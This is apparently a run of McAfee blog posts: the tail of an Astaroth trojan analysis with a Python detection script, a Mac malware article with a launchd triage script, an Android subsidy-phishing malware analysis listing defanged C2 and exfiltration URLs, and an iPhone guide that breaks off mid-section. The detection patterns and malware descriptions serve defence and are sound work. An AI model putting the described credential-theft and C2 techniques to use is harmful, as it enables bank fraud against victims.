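PROGRAMDATA = "c:\\programdata\\"
# ngrok TCP tunnels are exposed as <n>.tcp[.<region>].ngrok.io; the campaign's C2 sits behind such endpoints.
NGROK_TCP = re.compile(r"^\d+\.tcp(\.[a-z0-9-]+)?\.ngrok\.io$")

def flag_astaroth_chain(ev: ProcEvent) -> list[str]:
    """Return the chain stages this single event matches; an empty list means nothing noteworthy."""
    img, cmd, parent = ev.image.lower(), ev.cmdline.lower(), ev.parent_image.lower()
    hits = []
    # Stage 1: the LNK runs mshta.exe with an inline javascript: command that pulls the next stage.
    if img.endswith("\\mshta.exe") and "javascript:" in cmd:
        hits.append("mshta.exe running an inline javascript: command")
    # Stage 2: the renamed AutoIt interpreter in ProgramData is started with its compiled
    # script disguised as a .log file (Corsair.Yoga.06342.8476.366.log in the campaign).
    if img.startswith(PROGRAMDATA) and re.search(r'\.log(?=\s|"|$)', cmd):
        hits.append("ProgramData executable launched with a .log file as its script argument")
    # Stage 3: the Delphi injector DLL creates RegSvc.exe as the host for the decrypted payload.
    if img.endswith("\\regsvc.exe") and parent.startswith(PROGRAMDATA):
        hits.append("RegSvc.exe spawned by a ProgramData executable")
    # Stage 4: exfiltration goes to the C2 through an ngrok reverse proxy. ngrok has legitimate
    # users, so treat this as a lead to correlate with the stages above rather than a verdict.
    if ev.dest_host and NGROK_TCP.match(ev.dest_host.lower()):
        hits.append("outbound connection to an ngrok TCP tunnel endpoint")
    return hits

def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (image, hits) for every event that matched at least one stage, in input order."""
    return [(ev.image, h) for ev in events if (h := flag_astaroth_chain(ev))]

# Constructed sample telemetry modelled on the chain; only the dropped file names come from the post.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              'mshta.exe "javascript:/* constructed placeholder for the obfuscated downloader */"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\ProgramData\Corsair.Yoga.06342.8476.366.exe",
              r"C:\ProgramData\Corsair.Yoga.06342.8476.366.exe C:\ProgramData\Corsair.Yoga.06342.8476.366.log",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\RegSvc.exe",  # path assumed
              r"C:\Windows\System32\RegSvc.exe",
              r"C:\ProgramData\Corsair.Yoga.06342.8476.366.exe",
              dest_host="3.tcp.ngrok.io"),         # constructed tunnel hostname
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(image)
        for h in hits:
            print("  -", h)
```

Stage 2 also fires on the Startup-folder LNK at boot, since that LNK launches the same ProgramData interpreter with the same .log argument.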

    McAfee Coverage 

    McAfee has extensive coverage for Astaroth: 

    Trojan:Shortcut/SuspiciousLNK.OSRT 

    Trojan:Shortcut/Astaroth.OJS 

    Trojan:Script/Astaroth.DL 

    Trojan:Script/Astaroth.AI 

    Trojan:Script/AutoITLoader.LC!2 

    Trojan:Shortcut/Astaroth.STUP 

    Indicator Of Compromise(s) 


    The post Astaroth: Banking Trojan Abusing GitHub for Resilience appeared first on McAfee Blog.

    Can Apple Macs get Viruses?

    By: McAfee

    While Apple goes to great lengths to keep all its devices safe, this doesn’t mean your Mac is immune to all computer viruses. What does Apple provide in terms of antivirus protection? In this article, we will discuss some signs that your Mac may be infected with a virus or malware, the built-in protections that Apple provides, and how you can protect your computer and yourself from threats beyond viruses.

    What is a Mac virus?

    A computer virus is a piece of code that inserts itself into an application or operating system and spreads when that program is run. While viruses exist, most modern threats to macOS come in the form of other malicious software, also known as malware. While technically different from viruses, malware impacts your Mac computers similarly: it compromises your device, data, and privacy.

    Macs are not invulnerable to being hacked

    While Apple’s macOS has robust security features, it’s not impenetrable. Cybercriminals can compromise a Mac through several methods that bypass traditional virus signatures. Common attack vectors include software vulnerabilities, phishing attacks that steal passwords, drive-by downloads from compromised websites, malicious browser extensions that seem harmless, or remote access Trojans disguised as legitimate software.

    Common types of viruses and malware

    Understanding the common types of viruses and malware that target macOS can help you better protect your device and data. Here’s a closer look at the most prevalent forms of malware that Mac users should watch out for.

    • Adware and potentially unwanted programs (PUPs): These programs hijack your browser, alter your search engine, and bombard you with pop-up ads, severely impacting performance and privacy.
    • Trojans: Disguised as legitimate software, such as fake Adobe Flash Player installers or system optimization tools, trojans create a backdoor on your Mac for attackers to steal data, install other malware, or take control of your device.
    • Spyware and keyloggers: This malicious software operates silently in the background, recording your keystrokes, capturing login credentials, and monitoring your activity to steal sensitive personal and financial information.
    • Ransomware: A particularly damaging threat, ransomware encrypts your personal files, photos, and documents, making them inaccessible. Attackers then demand a hefty ransom payment for the decryption key.
    • Cryptominers: This malware hijacks your Mac’s processing power to mine for cryptocurrencies like Bitcoin. It doesn’t steal data but can cause extreme slowdowns, overheating, and increased electricity usage.

    Signs that your Mac may be hacked

Whether hackers physically sneak it onto your device or trick you into installing it via a phony app, a sketchy website, or a phishing attack, viruses and malware can create problems for you in several ways:

    Performance issues

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? These are all signs that you could have a virus or malware running in the background, sapping your device’s resources.

    Your computer heats up

    Malware or mining apps running in the background can burn extra computing power and data, causing your computer to operate at a high temperature or overheat.

    Mystery apps or data

    If you find unfamiliar apps you didn’t download, along with messages and emails that you didn’t send, that’s a red flag. A hacker may have hijacked your computer to send messages or to spread malware to your contacts. Similarly, if you see spikes in your data usage, that could be a sign of a hack as well.

    Pop-ups or changes to your screen

    Malware can also be behind spammy pop-ups, unauthorized changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your computer has been hacked.

    Browser redirects

    Your browser’s homepage or default search engine changes without your permission, and searches are redirected to unfamiliar sites. Check your browser’s settings and extensions for anything you don’t recognize.

    Disabled security features

    Your antivirus software or macOS firewall is disabled without your action. Some viruses or malware are capable of turning off your security software to allow them to perform their criminal activities.

    Check your Mac for viruses and malware

Fortunately, there are easy-to-use tools and key steps to help you check for viruses and malware so you can take action before any real damage is done.

    1. Check activity monitor: Navigate to Applications > Utilities > Activity Monitor and look for any unknown processes using a disproportionate amount of CPU or memory. A quick web search can help identify if a suspicious process is malicious.
    2. Review login items: Go to System Settings > General > Login Items. Check the “Open at Login” and “Allow in the Background” sections for any apps you don’t recognize and disable them.
    3. Inspect system profiles: In System Settings > Privacy & Security, scroll down to “Profiles.” If you see any profiles you did not intentionally install, aside from those for work or school, remove them.
    4. Audit browser extensions: Open your web browsers and review installed extensions. Remove any that you did not add or no longer use.
    5. Run a security scan: The most reliable method is to use a dedicated security application. Run a full system scan with a trusted program to detect and remove any malware that manual checks may have missed.
    6. Update everything: Ensure your macOS and all installed applications are up to date. Updates frequently contain critical security patches that protect against known vulnerabilities exploited by hackers.

    Built-in antivirus solution

    Macs contain several built-in features that help protect them from viruses:

    • XProtect and quarantine: XProtect is Apple’s proprietary antivirus software built into all Macs since 2009. It works the same as any other antivirus, scanning suspicious files and apps for malware, then quarantining or limiting their access to the Mac’s operating system and other key functions. XProtect relies on up-to-date information to spot malicious files. However, this information may be outdated, and may not always protect Mac users from the latest threats.
    • Malware removal tool: To further keep Apple users protected, the malware removal tool scans Macs to spot and catch any malware that may have slipped past XProtect. Similar to XProtect, it relies on a set of constantly updated definitions to identify potential malware, removes malware upon receiving updated information, and continues to check for infections on restart and login.
    • Notarization and Gatekeeper: Apps for Apple devices go through a review before they are distributed and sold outside the App Store. When this review turns up no instances of malware, Apple issues a notarization ticket. That ticket is recognized in the macOS Gatekeeper, which verifies the ticket and allows the app to launch. If a previously approved app is later found to be malicious, Apple revokes its notarization and prevents it from running.
    • App Store review: All apps that wish to be sold on the Apple App Store must go through Apple’s App Store review. While not strictly a review for malware, security matters are considered in this process to ensure that all apps posted on the App Store are “reliable, perform as expected, respect user privacy, and are free of objectionable content.”
    • Other features: In addition to the above, Apple includes technologies that prevent malware from doing more harm, such as preventing damage to critical system files.

    Do I need an antivirus for my Mac?

    There are a couple of reasons why Mac users may want to consider additional protection on top of the built-in antivirus safeguards:

    1. Apple’s antivirus may not recognize the latest threats. These tools primarily rely on known virus definitions, which may lag behind the latest cyberthreats including “zero-day” incidents. This leaves Mac owners susceptible to attack if they solely rely on XProtect and other features.
2. The Mac’s built-in security measures largely focus on viruses and malware. While protecting yourself from viruses and malware is of utmost importance, the reality is that antivirus is not enough. These tools don’t block other forms of harmful activity, such as phishing attacks, malicious apps downloaded outside of the App Store, suspicious links, prying eyes on public Wi-Fi, data breaches, and identity theft, among others.

    Macs are like any other connected device. They’re also susceptible to the wider world of threats and vulnerabilities on the internet. For this reason, Mac users should think about bolstering their defenses further with online protection software.

    Your guide to removing a Mac virus

    If you suspect your Mac has been infected with a virus or other malware, acting quickly is essential to protect your personal data and stop the threat from spreading. Fortunately, this can be effectively done with a combination of manual steps and trusted security software:

    1. Disconnect from the internet: Immediately disconnect from Wi-Fi or unplug the ethernet cable to prevent the malware from communicating with its server or spreading.
    2. Remove suspicious apps: Open your Applications folder. Drag any unfamiliar or recently installed suspicious applications to the Trash and then empty it.
    3. Delete malicious files: Malware often hides files in your Library folders. Navigate to Finder > Go > Go to Folder and check paths like ~/Library/LaunchAgents and /Library/LaunchDaemons for suspicious files. Be cautious when deleting system files.
    4. Clean up browsers: Remove any unknown extensions from your web browsers and reset your homepage and search engine settings if they were altered.
    5. Run a security scan: The safest and most effective method is to run a full scan with a trusted security solution. This will automatically identify, quarantine, and remove all traces of the infection.
    6. Restore from a clean backup: If the infection is severe and persistent, your best option may be to erase your Mac and cautiously restore from a Time Machine backup created *before* you noticed signs of the virus. If you restore from a backup version that was already infected, you will re-introduce the malware to your clean system.
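    Step 3 above points at the launchd folders where malware commonly persists. As an added example (not McAfee’s code), the script below parses every plist in those folders and flags the indicators a responder would look at first; the heuristics and the two constructed sample plists are illustrative assumptions, so treat a hit as something to review, not an automatic verdict.

```python
"""Triage launchd persistence entries on a Mac before deleting anything by hand.
Added example for this article, not McAfee's code. The heuristics are general
indicators seen in macOS malware persistence (assumptions), not a verdict."""
import os
import plistlib
import re
import tempfile
from dataclasses import dataclass, field
from typing import List, Optional

# The locations step 3 tells the reader to inspect.
LAUNCHD_DIRS = [
    os.path.expanduser("~/Library/LaunchAgents"),
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
]

# Places where a legitimately installed agent's executable rarely lives:
# temp dirs, the shared user folder, a user's Library, or any hidden directory.
SUSPICIOUS_PATH_RE = re.compile(
    r"^(/tmp/|/private/tmp/|/var/tmp/|/Users/Shared/|/Users/[^/]+/Library/|.*/\.[^/]+/)"
)


@dataclass
class Finding:
    plist_path: str
    label: str
    program: str
    reasons: List[str] = field(default_factory=list)


def program_of(plist: dict) -> str:
    """Return the executable launchd runs: Program, else ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def assess(plist_path: str, plist: dict) -> Optional[Finding]:
    """Apply the heuristics to one parsed launchd plist."""
    program = program_of(plist)
    label = str(plist.get("Label", ""))
    reasons = []
    if SUSPICIOUS_PATH_RE.match(program):
        reasons.append(f"program runs from an unusual location: {program}")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad with KeepAlive (relaunches itself if killed)")
    if os.path.basename(plist_path).startswith("."):
        reasons.append("hidden plist filename")
    if label.startswith("com.apple.") and not program.startswith(("/System/", "/usr/")):
        reasons.append("com.apple.* label but program lives outside system paths")
    return Finding(plist_path, label, program, reasons) if reasons else None


def audit_file(plist_path: str) -> Optional[Finding]:
    """Parse one plist; an unparseable file in these folders is itself worth a look."""
    try:
        with open(plist_path, "rb") as fh:
            data = plistlib.load(fh)
    except Exception as exc:  # malformed XML or binary plist
        return Finding(plist_path, "", "", [f"unparseable plist: {exc}"])
    return assess(plist_path, data)


def audit_dirs(dirs: List[str] = LAUNCHD_DIRS) -> List[Finding]:
    """Audit every .plist in the given directories; missing directories are skipped."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if name.endswith(".plist"):
                finding = audit_file(os.path.join(d, name))
                if finding:
                    findings.append(finding)
    return findings


def build_demo_dir() -> str:
    """Write two constructed sample plists (one benign, one suspicious) to a temp dir."""
    d = tempfile.mkdtemp(prefix="launchagents-demo-")
    benign = {
        "Label": "com.example.sync",
        "ProgramArguments": ["/Applications/Sync.app/Contents/MacOS/sync"],
        "RunAtLoad": True,
    }
    suspicious = {  # constructed: hidden-dir agent posing as Apple software
        "Label": "com.apple.softwareupdate.helper",
        "ProgramArguments": ["/Users/Shared/.cache/helper", "--daemon"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }
    for name, content in [("com.example.sync.plist", benign),
                          ("com.apple.softwareupdate.helper.plist", suspicious)]:
        with open(os.path.join(d, name), "wb") as fh:
            plistlib.dump(content, fh)
    return d


if __name__ == "__main__":
    # Audits the real folders; pass [build_demo_dir()] instead to see the sample hit.
    for f in audit_dirs():
        print(f"{f.plist_path} [{f.label}] -> {f.program}")
        for reason in f.reasons:
            print("   -", reason)
```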

    Last resort: Reinstalling your macOS

    In the most extreme cases, erasing your hard drive and reinstalling a fresh copy of macOS is a very effective way to eliminate viruses and malware. This process wipes out all data, including the malicious software. This, however, is considered the last resort for deep-rooted infections that are difficult to remove manually.

    Future-proof your Mac from viruses

    As cyber threats grow more sophisticated, taking proactive steps now can protect your device, your data, and your identity in the long run. Here are simple but powerful ways to future-proof your Mac, and help ensure your device stays protected against tomorrow’s threats before they reach you:

    • Keep everything updated: Enable automatic updates for macOS and your applications. This is the single most important step to protect against vulnerabilities.
    • Download from trusted sources only: Stick to the Apple App Store or the official websites of reputable developers. Avoid downloading software from unvetted third-party aggregators or torrent sites.
    • Use strong passwords and multi-factor authentication (MFA): Protect your Apple ID and other accounts with long, complex, and unique passwords and enable MFA to prevent unauthorized access.
    • Be skeptical of unsolicited messages: Do not click on links or download attachments in suspicious emails or texts. These are primary methods for delivering malware and conducting phishing attacks.
    • Install comprehensive security software: Use a trusted security suite like McAfee+ for real-time protection that goes beyond Apple’s built-in tools, offering features like web protection, a firewall, and anti-phishing technology.
    • Back up your data regularly: Maintain regular backups of your important files using Time Machine or a cloud service. This ensures you can recover your data without paying a ransom in a ransomware attack.
    • Stay informed: Be aware of the threats out there and take a proactive stance to fill the gaps in protection. Comprehensive security suites like McAfee+ can take care of it for you. Our exclusive Protection Score checks your online safety, identifies any gaps, and offers personalized guidance to seal those cracks.

    Best digital habits to practice

    Staying safe online isn’t just about having the right software—it’s about making smart choices every day. Adopting strong digital habits can drastically reduce your risk of falling victim to viruses, scams, or data breaches.

    • Browse safely: Be wary of unsolicited links, pop-up windows, and urgent warnings. Use a web protection tool to block known malicious websites before they can load.
    • Scrutinize downloads: Never install software from an untrusted source. Read installation prompts carefully to deselect any bundled optional software or PUPs.
    • Improve email hygiene: Treat emails with attachments or links with caution, even from known senders, as their accounts could be compromised. Verify any unusual requests through a separate communication channel.
    • Review app permissions: When an application asks for permission to access your contacts, location, or other data, consider if it truly needs that access to function. Deny any unnecessary requests.
    • Enable your firewall: Ensure the macOS firewall is turned on in System Settings > Network > Firewall. This provides a basic but important barrier against unsolicited incoming network connections.

    It’s about protecting yourself

    An important part of McAfee’s Protection Score involves protecting your identity and privacy beyond the antivirus solution. As online threats have evolved, McAfee has elevated its online protection software to thwart hackers, scammers, and cyberthieves who aim to steal your personal info, online banking accounts, financial info, and even your social media accounts to commit identity theft and fraud in your name. As you go about your day online, online protection suites help you do it more privately and safely. Comprehensive security solutions like McAfee+ include:

    • Personal data cleanup reveals which high-risk data brokers and search sites are collecting and selling your personal information. It then requests the removal of your information, confirms completion, and conducts ongoing scans as your data continues to be collected.
    • Unlimited secure VPN automatically connects to public Wi-Fi to protect your online privacy and safeguards personal data while you bank, shop, or browse online.
    • Identity theft and stolen funds coverage reimburses up to $1 million in lost funds or expenses, including losses to 401(k) accounts, while restoring your identity.
    • Ransomware coverage reimburses up to $25,000 for losses and ransom fees.
    • Licensed restoration experts who help repair identity and credit issues, including assistance with the identity fraud of a deceased family member.
    • Credit monitoring promptly alerts you about changes to your credit score, report, and accounts and guides you on actions needed to tackle identity theft.
    • Credit Score and Report help you stay on top of daily changes to your credit score and report, from a single location.
    • Security freeze prevents unauthorized access to existing accounts or new ones being set up in your name with a credit, bank, or utility account freeze.
    • Identity monitoring scans for up to 60 unique pieces of personal information on the dark web with timely alerts up to 10 months sooner than competitive products.

    FAQs about Mac viruses

    Can Macs get viruses from Safari?

    Yes. While Safari has built-in security features, you can still get a Mac virus by visiting a compromised website that initiates a drive-by download or by being tricked into downloading and running a malicious file.

    Do pop-ups mean my Mac is infected?

    Not necessarily. Many websites use aggressive pop-up advertising. However, if you see persistent pop-ups that are difficult to close, or fake virus warnings, it’s a strong sign of an adware infection.

    Is adware a type of malware?

    Yes. While some consider it less harmful than a trojan, adware is a form of malware. It compromises your browsing experience, tracks your activity, slows down your computer, and can serve as a gateway for more dangerous infections.

    How often should you scan for viruses?

    If you have a security suite with real-time protection, your Mac is continuously monitored. It is still good practice to run a full system scan at least once a week for peace of mind.

    Can iPhones spread malware to Macs?

    Direct infection via a cable is extremely unlikely due to the security architecture of both operating systems. The greater risk comes from shared accounts. A malicious link or file opened on one device and synced via iCloud, or a compromised Apple ID, could affect your other devices.

    Final thoughts

    Current trends show a rise in sophisticated adware and PUPs that are often bundled with legitimate-looking software. Cybercriminals are also focusing on malicious browser extensions that steal data and credentials, injecting malicious code into legitimate software updates, or devising clever ways to bypass Apple’s notarization process. Given these developments, Macs can and do get viruses and are subject to threats just like any other computer. While Apple provides a strong security foundation, their operating systems may not offer the full breadth of protection you need, particularly against online identity theft and the latest malware threats. Combining an updated system, smart online habits, and a comprehensive protection solution helps you stay well ahead of emerging threats. Regularly reviewing your Mac’s security posture and following the tips outlined here will also enable you to use your device with confidence and peace of mind.

    The post Can Apple Macs get Viruses? appeared first on McAfee Blog.

    Android Malware Promises Energy Subsidy to Steal Financial Data

    Authored by ZePeng Chen

    Recently, we identified an active Android phishing campaign targeting Indian users. The attackers impersonate a government electricity subsidy service to lure victims into installing a malicious app. In addition to stealing financial information, the malicious app also steals text messages, uses the infected device to send smishing messages to the user’s contact list, and can be remotely controlled using Firebase; both the phishing website and the malware were hosted on GitHub. This attack chain leverages YouTube videos, a fake government-like website, and a GitHub-hosted APK file—forming a well-orchestrated social engineering operation. The campaign involves fake subsidy promises, user data theft, and remote-control functionality, posing a substantial threat to user privacy and financial security.

    McAfee, as part of the App Defense Alliance committed to protecting users and the app ecosystem, reported the identified malicious apps to Google. As a result, Google blocked the associated FCM account to prevent further abuse. McAfee also reported the GitHub-hosted repository to the GitHub Developer Support Team, which took action and removed it from GitHub. McAfee Mobile Security detects these malicious applications as a high-risk threat. For more information, and to get fully protected, visit McAfee Mobile Security.

    Background

    The Government of India approved the PM Surya Ghar: Muft Bijli Yojana on 29th February, 2024 to increase the share of solar rooftop capacity and empower residential households to generate their own electricity. The scheme provides a subsidy of 60% of the solar unit cost for systems up to 2 kW capacity and 40% of the additional system cost for systems between 2 and 3 kW capacity. The subsidy is capped at 3 kW capacity. Interested consumers have to register on the National Portal by selecting their state and electricity distribution company. Scammers use this subsidy scheme to create phishing websites and fake applications that steal the bank account information of users who want to apply for the subsidy.

    Technical Findings

    Distribution Methods

    This phishing operation unfolds in multiple stages:

    1. YouTube Video Lure: The attackers upload promotional videos claiming users can receive “government electricity subsidies” through a mobile app. A shortened URL is included in the video description to encourage users to click.

    Figure 1. YouTube video promoting the phishing URL

    2. Phishing Website Imitation: The shortened URL redirects to a phishing website hosted on GitHub. It is designed to closely resemble an official Indian government portal.

    Figure 2. Phishing and official website

    The phishing site includes fake registration instructions; once users believe this introduction, they have no doubts about the steps that follow. The phishing site also shows a fake Google Play icon, making users believe it is a Google Play app, but in reality the icon points to an APK file on GitHub. When victims click the Google Play icon, the APK is downloaded from the GitHub repository instead of opening the Google Play Store.

    3. GitHub-Hosted APK and Phishing page

    Both the phishing site source and the APK file are hosted on the same GitHub repository—likely to bypass security detection and appear more legitimate. The repository activity shows that this malicious app has been continuously developed since October 2024, with frequent updates observed in recent weeks.

    Figure 3. Malware repository in GitHub

    Installation without network

    The downloaded APK is not the main malicious component. Instead, it contains an embedded APK at assets/app.apk, which is the actual malware; the initial APK serves only to install the embedded one. During installation, users are deceived into believing they are installing a “security update” and are prompted to disable mobile data or Wi-Fi, likely to reduce the effectiveness of malware detection solutions that rely on cloud lookups. McAfee is still able to detect this threat in offline mode.

    Figure 4. Install a malicious APK without a network

    Following the installation instructions results in two applications being installed on the device:

    • PMBY – The initial APK, used to install PMMBY.
    • PMMBY – The malware APK, installed under the guise of a “Secure Update”.

    Figure 5. Application names and icons.

    Malware analysis

    PMMBY is an application that actually carries out malicious behavior—let’s delve into the concrete details of how it accomplishes this.

    It requests aggressive permissions when launched:

    • READ_CONTACTS – Read contacts list
    • CALL_PHONE – Make/manage phone calls
    • READ_SMS, SEND_SMS – View and send SMS messages
    • Notification access – For spamming or masking malicious actions

    Figure 6. Aggressive permissions request

    Fake UI and Registration Process

    Once permissions are granted, the app displays a fake electricity provider selection screen. The message “To Get 300 Unit Free Every Month Please Select Your Electricity Provider From Below And Proceed” is shown in English and Hindi to prompt users to select their provider.

    Figure 7. “SELECT YOUR PROVIDER” Activity

    After selecting a provider, the app presents a fake registration form asking for the user’s phone number and a ₹1 payment to “generate a registration token.”

    Figure 8. Registration Form

    In this stage, the malware creates a background task that sends an HTTPS request to https[://]rebrand[.]ly/dclinkto2. The response text is https[://]sqcepo[.]replit[.]app/gate[.]html,https[://]sqcepo[.]replit[.]app/addsm[.]php. The string is split into two URLs:

    • UPI PIN URL – https[://]sqcepo[.]replit[.]app/gate[.]html. It is used in the “ENTER UPI PIN” process. When the malware uses this URL, “gate.html” is replaced with “gate.htm”, so the loaded URL is https[://]sqcepo[.]replit[.]app/gate[.]htm.
    • SMS upload URL – https[://]sqcepo[.]replit[.]app/addsm[.]php. Incoming SMS messages are uploaded to this URL.

    Figure 9. dclinkto2 request

    In the “MAKE PAYMENT of ₹1” stage, victims are asked to use the “UPI-Lite” app to complete the payment. In the “UPI-Lite” activity, victims enter their bank UPI PIN.

    Figure 10. The process of “ENTER UPI PIN”

    UPI Credential Theft

    The UPI-Lite activity is a fake HTML form loaded from https[://]sqcepo[.]replit[.]app/gate[.]htm.

    Once submitted, the phone number, bank details, and UPI PIN are uploaded to https[://]sqcepo[.]replit[.]app/addup[.]php. Once the attacker obtains this information, they can steal money from the victim’s bank account.

    Figure 11. Posting the user’s banking information.

    Malware Background Behaviors

    In addition to stealing the user’s financial and banking information, the malware is also able to distribute itself by sending phishing messages to the victim’s contact list, steals the user’s text messages (probably to intercept 2FA codes), and can be remotely controlled via Firebase.

    • Send mass phishing SMS messages to Indian users from the victims’ contacts list.

    Figure 12. Send Phishing SMS message.

    • Upload SMS messages to the server.

    The malware requests SMS read permission when it is launched. When an incoming SMS message arrives, it handles the message and posts the following data to the remote server (https[://]sqcepo[.]replit[.]app/addsm[.]php):

    • senderNum: The phone number that sent the incoming message.
    • Message: The incoming SMS message.
    • Slot: The SIM slot that received the message.
    • Device rand: A random number created during the first run to identify the device.

    Figure 13. Post Incoming SMS message

    • Firebase as a Command Channel.

    Attackers use FCM (Firebase Cloud Messaging) to send commands that control infected devices. The malware executes different commands according to the _type value in the message.

    Table 1. Commands from FCM message

    Figure 14. Commands from FCM message

    Recommendations

    To protect against such sophisticated attacks, users and defenders should take the following precautions:

    • Avoid downloading apps from unofficial websites:
      Especially those offering benefits like subsidies, rewards, or financial aid.
    • Be cautious of apps that require disabling network connections:
      This is often a red flag used to evade real-time antivirus scanning.
    • Carefully review app permissions:
      Apps requesting contact access, SMS read/send or call permissions—without clear reason—should be treated as suspicious.
    • Use security software with SMS protection:
      Enable permission alerts and use reputable mobile security apps to detect abnormal app behavior. McAfee’s Scam Detector provides additional protection against the smishing component.

    Cybercriminals are using relevant themes like energy subsidies to trick users into providing financial information. This campaign demonstrates an integrated and stealthy attack chain. YouTube is used to distribute the phishing link; GitHub, a reliable and legitimate website, is used both to distribute the malicious APK and to serve the phishing website, which makes the campaign more difficult to identify and take down; and through Firebase Cloud Messaging (FCM), the malware authors can remotely update the phishing text messages to make them more effective at tricking users into installing the malware. With its self-propagation capabilities, financial data theft, and remote-control functions, it poses a serious risk. We will continue to monitor this threat, track emerging variants, and coordinate with relevant platforms to report and help take down associated infrastructure.

    Indicators of Compromise (IOCs)

    The post Android Malware Promises Energy Subsidy to Steal Financial Data appeared first on McAfee Blog.

    A Guide to Remove Malware From Your iPhone

    By: McAfee

    Malicious software, also called malware, refers to any program or code engineered to harm or exploit computer systems, networks and devices. It affects your phone’s functionality, especially if you jailbreak your device—that is, opening your iOS to additional features, apps, and themes. 

    The risks associated with a malware infection can range from poor device performance to stolen data. Cybercriminals typically use it to extract data—from financial data and healthcare records to emails and passwords—that they can leverage over victims for financial gain. 

    Thanks to their closed ecosystem, built-in security features, and strict policies on third-party apps, Apple devices tend to be generally resilient against malware infections. It’s important to note, however, that they’re not completely without vulnerabilities.

    Read on to learn how you can detect malware on your iPhone and how to remove these infections so you can get back to enjoying your digital activities.

    What is iPhone malware?

    While traditional self-replicating viruses are rare on iPhones, malware is a genuine threat for Apple devices. Malware typically enters through links in deceptive texts or emails or through downloaded, unvetted apps rather than system-wide infection. These are some types of malware that could infect your iPhone:

    • Adware: Once embedded into your phone, adware collects your personal data and learns browsing habits to determine what kinds of ads can be targeted to you. It then bombards your screen with pop-up ads.
    • Ransomware: This type of malware encrypts your files or locks you out of your computer, making the data inaccessible. The attackers then demand a ransom before releasing your encrypted files or systems.
    • Spyware: This malicious software sits on your device, tracks your online activities, then sends it to a central server controlled by third-party internet service providers, hackers, and scammers, who then exploit this information to their advantage.
    • Trojans: Disguised as a real, operational program, this type of malware steals passwords, PINs, credit card data, and other private information.

    Understanding Apple’s built-in security layers

    To keep you safe against malware and other threats, Apple engineers the iPhone with multiple security layers, including:

    • Secure Enclave: This hardware feature is a dedicated secure subsystem in Apple devices that protects your most sensitive data, such as Face ID or Touch ID information in a separate, fortified processor. 
    • Sandboxing: This process serves as a digital wall around each app, preventing it from meddling with other apps or accessing your core iOS system files. A downloaded app is first isolated or sandboxed to prevent it from accessing data in your iPhone or modifying the operating system. 
    • App Store review: Apple also enforces a process to strictly vet apps for malicious code, and it delivers rapid security patches via regular iOS updates to fix vulnerabilities quickly. 

    Together, these features create a highly secure environment for iPhones. However, this robust shield does not eliminate all risks, as threats can still bypass these defenses through phishing scams or by tricking a user into installing a malicious configuration profile.

    6 signs of malware on your iPhone and quick actions

    If your iPhone is exhibiting these odd activities listed below, a manual scan is your first point of order. These quick actions are free to do as they are already integrated into your device.

    • Sudden battery drain: Your battery dies much faster than it should. This could mean malware is secretly running in the background and consuming a significant amount of power. To make sure that no such apps are installed on your phone, head over to Settings > Battery and select a period of your choice. Uninstall any unfamiliar apps that stand out.
    • Unexpected data spikes: You notice a sudden jump in your data usage, which could mean malware is sending information from your phone to a hacker’s server. Keep an eye on it if you suspect malware is in your system. To do so, go to Settings > Mobile Data and check if your data usage is higher than usual.
    • Constant pop-ups: Occasionally running into pop-up ads is inevitable when browsing the internet. However, your phone might be infected with adware if you’re getting them with alarming frequency. Never click the pop-ups. Instead, go to Settings > Safari and tap Clear History and Website Data. This can remove adware and reset your browser.
    • Overheating device: Your iPhone feels unusually hot, even when idle, as malicious software can cause the processor to work overtime. Restart your phone to terminate any hidden processes causing the issue.
    • Mysterious apps appear: You discover apps on your iPhone that you are certain you never downloaded. Take some time to swipe through all of your apps and closely inspect or uninstall any that you don’t recognize or remember downloading. 
    • Sluggish performance: Your phone becomes slow, apps crash unexpectedly, or the entire system freezes for no reason. A simple restart can often clear up performance issues and improve responsiveness.

    The disadvantage of doing a manual scan is that it requires effort. In addition, it does not detect sophisticated malware, and only identifies symptoms rather than root causes.

    Scan your iPhone for malware

    If your iPhone persistently exhibits any of the red flags above despite your quick actions, you may have to investigate using a third-party security app to find the threats that manual checks don’t catch. 

    Compared with manual or built-in scans, third-party solutions like McAfee Mobile Security offer automated, comprehensive malware scans by detecting a wider range of threats before they enter your digital space. While available at a premium, third-party security suites offer great value as they include full-scale protection that includes a safe browsing feature to protect your digital life and a virtual private network (VPN) for a more secure internet connection. 

    How to remove malware from your iPhone

    If the scan confirms the presence of malware on your iPhone, don’t worry. There’s still time to protect yourself and your data. Below is an action plan you can follow to remove malware from your device.

    Update your iOS, if applicable

    In many cases, hackers exploit outdated versions of iOS to launch malware attacks. If you don’t have the latest version of your operating system, it’s a good idea to update your iOS immediately to close this potential vulnerability. To do this, go to Settings > General > Software Update and follow the instructions to update your iPhone.

    Restart your device

    It might sound simple, but restarting your device can fix certain issues. The system will restart on its own when updating the iOS. If you already have the latest version, restart your iPhone now.

    Clear your iPhone browsing history and data

    If updating the iOS and restarting your device didn’t fix the issue, try clearing your phone’s browsing history and data. If you’re using Safari, go to Settings > Clear History and Website Data > Clear History and Data. Keep in mind that the process is similar for Google Chrome and most other popular web browsers.

    Remove any suspicious apps

    Malicious software, such as spyware and ransomware, often ends up on phones by masquerading as legitimate apps. To err on the side of caution, delete any apps that you don’t remember downloading or installing.

    Restore your iPhone

    The option to restore to a previous backup is one of the most valuable features found on the iPhone and iPad. This allows you to restore your device to an iCloud backup version that was made before the malware infection. Go to Settings > General > Transfer or Reset iPhone > Erase All Content and Settings > Restore from iCloud Backup.

    Factory reset your iPhone

